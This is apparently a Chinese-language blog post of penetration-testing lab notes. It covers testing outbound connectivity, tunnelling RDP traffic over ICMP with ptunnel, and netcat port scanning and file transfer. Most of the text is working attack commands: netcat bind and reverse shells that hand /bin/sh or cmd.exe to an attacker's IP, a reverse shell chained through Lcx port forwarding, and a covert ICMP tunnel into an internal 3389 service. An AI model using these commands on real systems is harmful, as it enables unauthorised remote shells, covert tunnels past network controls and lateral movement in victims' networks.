ICMP隧道、nc反弹shell,扫描功能

网络传输应用层检测连通性-检测

1. TCP 协议

用“瑞士军刀”——netcat

执行 nc 命令:nc <IP> <端口>

2. HTTP 协议

用“curl”工具,执行curl <IP地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的话,就会输出相应的端口信息

3. ICMP 协议

用“ping”命令,执行ping <IP地址/域名>

4. DNS 协议

检测DNS连通性常用的命令是“nslookup”和“dig”

nslookup 是windows自带的DNS探测命令

dig是linux系统自带的DNS探测命令

 

网络层ICMP隧道ptunnel使用-检测,利用

kali2020-Target2-Target3

pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具

-p  ##表示连接icmp隧道另一端的机器IP(即目标服务器)

-lp ##表示需要监听的本地tcp端口

-da ##指定需要转发的机器的IP(即目标内网某一机器的内网IP)

-dp ##指定需要转发的机器的端口(即目标内网某一机器的内网端口)

-x  ##设置连接的密码

Webserver:./ptunnel -x xiaodi

Hacker xiaodi:./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080

Hacker xiaodi:rdesktop 127.0.0.1 1080

老版本介绍:https://github.com/f1vefour/ptunnel(需自行编译)

新版本介绍:https://github.com/esrrhs/pingtunnel(二次开发版)

 

 

 

传输层转发隧道Netcat使用-检测,利用,功能

Kali2020-god\webserver-god\sqlserver|dc

1.双向连接反弹shell

正向:攻击连接受害

受害:nc -ldp 1234 -e /bin/sh //linux

nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows

攻击:nc 192.168.76.132 1234 //主动连接

反向:受害连接攻击

攻击:nc -lvp 1234

受害:nc 攻击主机IP 1234 -e /bin/sh

nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe

2.多向连接反弹shell-配合转发

反向:

god\Webserver:Lcx.exe -listen 2222 3333

god\Sqlserver:nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe

kali或本机:nc -v 192.168.76.143 3333

正向该怎么操作呢?实战中改怎么选择正向和反向?

3.相关netcat主要功能测试

指纹服务:nc -nv 192.168.76.143

端口扫描:nc -v -z 192.168.76.143 1-100

端口监听:nc -lvp xxxx

文件传输:nc -lp 1111 >1.txt | nc -vn xx.xx.x.x 1111 <1.txt -q 1

反弹Shell:见上

 

ICMP隧道、nc反弹shell,扫描功能

上一篇:ubuntu16.04 安装elasticsearch


下一篇:Linux命令应用1